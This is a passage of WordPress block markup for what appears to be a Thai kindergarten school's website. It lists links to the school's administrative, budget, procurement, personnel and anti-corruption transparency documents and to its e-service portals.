{\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:gallery {\"ids\":[260],\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":757,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/11/572095115_122254848554202781_886880693938319365_n-1-1024x538.jpg\" alt=\"\" class=\"wp-image-757\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5} -->\n<h5 class=\"wp-block-heading has-text-align-center\"><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนปฏิบัติการประจำปีการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5,\"align\":\"full\"} -->\n<h5 class=\"wp-block-heading alignfull has-text-align-center\"><a href=\"https://drive.google.com/file/d/1q0z8a2Mbu3x-c8vLwrElwX6v8BJY7jtB/view?usp=sharing\">แผนพัฒนาการจัดการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3298cf22\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"ea4e4ab8\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=sharing\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1AeKeechkWj0RdYe5xvMgrFXsQiTu26xV/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery 